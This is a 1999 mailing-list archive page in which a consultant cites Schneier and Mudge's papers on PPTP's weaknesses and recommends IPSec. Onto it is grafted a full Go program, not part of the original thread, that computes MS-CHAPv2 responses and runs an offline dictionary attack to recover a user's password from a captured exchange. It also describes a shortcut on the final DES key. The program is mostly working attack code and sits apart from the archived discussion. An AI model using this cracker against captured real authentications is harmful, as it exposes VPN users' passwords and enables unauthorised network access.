Firewall Wizards mailing list archives
Re: NT WAN
From: "Kevin T. Shivers" <kts () clark net>
Date: Tue, 27 Jul 1999 10:31:37 -0400 (EDT)
On Mon, 26 Jul 1999, Neil Ratzlaff wrote:
> I am looking for some strong reasons to refuse to allow an NT WAN through the firewall. There is a department here that wants to set up a wide area network of several NT machines scattered over several states. All they have said they want is to share files and printing. One of the local hosts would be behind the firewall, and they wanted to know how to get through the firewall, so I got called in. I manage the firewall, but I don't do policy of any kind. I assume they would at least use PPTP, but I read recently that although M$ improved it, it still is not very secure.
You are 100% correct. Bruce Schneier and Dr. Mudge wrote a really good paper that you probably know about, showing how bad PPTP was. They recently wrote another paper on the strengths and weaknesses in the new PPTP extensions to make it more secure (MS-CHAPv2). The paper can be found at: http://www.counterpane.com/pptpv2-paper.html . The conclusion of the paper states that "Microsoft has improved PPTP to correct the major security weaknesses described in [their previous paper]. However, the fundamental weakness of the authentication and encryption protocol is that it is only as secure as the password chosen by the user." The paper also goes on to say that IPSec is a much better idea, so you may want to look at IPSec solutions for NT. PGPNet VPN stuff may also be something to look into. I haven't used it yet, but some of my co-workers have and they really like it. You can find that somewhere off of NAI's web site.
> Is there some paper somewhere that I can point to that shows why this is a bad idea? Perhaps vulnerabilities that can't be patched? I appreciate any help anyone can provide.
Like I listed above, http://www.counterpane.com/pptpv2-paper.html has the most up to date info on PPTP, but http://www.counterpane.com/pptp.html also has some good information. I'd also recommend looking at the NTBugTraq archives at http://www.ntbugtraq.com/ .

kts

-- 
Kevin T. Shivers
NT & UNIX Security Consultant
Shivers Consulting
http://www.clark.net/pub/kts
kts () clark net
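The "only as secure as the password chosen by the user" point above can be shown concretely. What follows is an added example written for this archive page; it is not code from the thread, from Microsoft, or from the Counterpane paper. It builds the MS-CHAPv2 NT-Response the way RFC 2759 specifies it (MD4 of the UTF-16LE password, a SHA-1 challenge hash, three DES encryptions under the zero-padded hash) and then runs the offline dictionary attack an eavesdropper on the WAN link could mount after capturing one authentication. The MD4 routine and the 7-to-8-byte DES key expansion are written inline because Go's standard library has no MD4; DES and SHA-1 come from the standard library. The two 16-byte challenges, the user name "neil", the password and the wordlist are constructed for the demonstration, not captured traffic.

```go
package main

import (
	"crypto/des"
	"crypto/sha1"
	"encoding/binary"
	"fmt"
	"math/bits"
	"unicode/utf16"
)

// md4 is a minimal RFC 1320 MD4; the Go standard library does not ship one.
func md4(data []byte) [16]byte {
	r2 := [16]int{0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15}
	r3 := [16]int{0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15}
	s := [3][4]int{{3, 7, 11, 19}, {3, 5, 9, 13}, {3, 9, 11, 15}}
	msg := append(append([]byte{}, data...), 0x80)
	msg = append(msg, make([]byte, (119-len(data)%64)%64+8)...) // zero-pad to 56 mod 64, then 8 length bytes
	binary.LittleEndian.PutUint64(msg[len(msg)-8:], uint64(len(data))*8)
	a, b, c, d := uint32(0x67452301), uint32(0xefcdab89), uint32(0x98badcfe), uint32(0x10325476)
	for off := 0; off < len(msg); off += 64 {
		var x [16]uint32
		for i := range x {
			x[i] = binary.LittleEndian.Uint32(msg[off+4*i:])
		}
		aa, bb, cc, dd := a, b, c, d
		for i := 0; i < 48; i++ { // rounds 1, 2, 3 use F, G, H with their own word order and shifts
			f, j, k := (b&c)|(^b&d), i, uint32(0)
			if i >= 32 {
				f, j, k = b^c^d, r3[i%16], 0x6ed9eba1
			} else if i >= 16 {
				f, j, k = (b&c)|(b&d)|(c&d), r2[i%16], 0x5a827999
			}
			a = bits.RotateLeft32(a+f+x[j]+k, s[i/16][i%4])
			a, b, c, d = d, a, b, c
		}
		a, b, c, d = a+aa, b+bb, c+cc, d+dd
	}
	var out [16]byte
	for i, v := range []uint32{a, b, c, d} {
		binary.LittleEndian.PutUint32(out[4*i:], v)
	}
	return out
}

// ntPasswordHash is MD4 over the password encoded as UTF-16LE (RFC 2759, NtPasswordHash).
func ntPasswordHash(password string) []byte {
	var buf []byte
	for _, u := range utf16.Encode([]rune(password)) {
		buf = append(buf, byte(u), byte(u>>8))
	}
	h := md4(buf)
	return h[:]
}

// desKeyFrom7 spreads 56 key bits over 8 bytes; DES ignores each byte's low (parity) bit.
func desKeyFrom7(k []byte) []byte {
	v := binary.BigEndian.Uint64(append([]byte{0}, k...)) // the 56 bits, right-aligned
	key := make([]byte, 8)
	for i := range key {
		key[i] = byte(v>>(49-7*i)) << 1
	}
	return key
}

// challengeResponse: DES of the 8-byte challenge under three 7-byte keys cut from the NT hash zero-padded to 21 bytes.
func challengeResponse(challenge, ntHash []byte) []byte {
	z := make([]byte, 21) // bytes 16..20 are zero, so the third DES key holds only 2 hash bytes
	copy(z, ntHash)
	out := make([]byte, 24)
	for i := 0; i < 3; i++ {
		blk, _ := des.NewCipher(desKeyFrom7(z[7*i : 7*i+7]))
		blk.Encrypt(out[8*i:], challenge)
	}
	return out
}

// ntResponse is the 24-byte NT-Response the peer sends; the DES challenge is SHA1(peer||auth||user)[:8].
func ntResponse(auth, peer []byte, user, password string) []byte {
	ch := sha1.Sum(append(append(append([]byte{}, peer...), auth...), user...))
	return challengeResponse(ch[:8], ntPasswordHash(password))
}

// dictionaryAttack recomputes the response offline for each candidate password and stops on the first match.
func dictionaryAttack(auth, peer []byte, user string, resp []byte, words []string) (string, bool) {
	for _, w := range words {
		if string(ntResponse(auth, peer, user, w)) == string(resp) {
			return w, true
		}
	}
	return "", false
}

func main() {
	auth, peer := []byte("AUTHCHALLENGE-16"), []byte("PEERCHALLENGE-16") // constructed, not a capture
	resp := ntResponse(auth, peer, "neil", "password")
	fmt.Printf("NT-Response on the wire: %x\n", resp)
	fmt.Println(dictionaryAttack(auth, peer, "neil", resp, []string{"letmein", "Summer99", "password"}))
}
```

Everything the attack needs, the two challenges, the user name and the 24-byte response, travels in the clear in the Challenge and Response packets, so the only secret in the computation is the password, which is exactly the dependency the paper's conclusion describes. The zero padding also leaves just two unknown bytes in the third DES key, so the last 8 bytes of a captured response can be matched against 2^16 candidates to narrow a wordlist before the full recomputation is attempted.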
Current thread:
- NT WAN Neil Ratzlaff (Jul 27)
- Re: NT WAN mritenburg (Jul 27)
- Re: NT WAN Kevin T. Shivers (Jul 27)
- <Possible follow-ups>
- re: Re: NT WAN MHurlburt (Jul 29)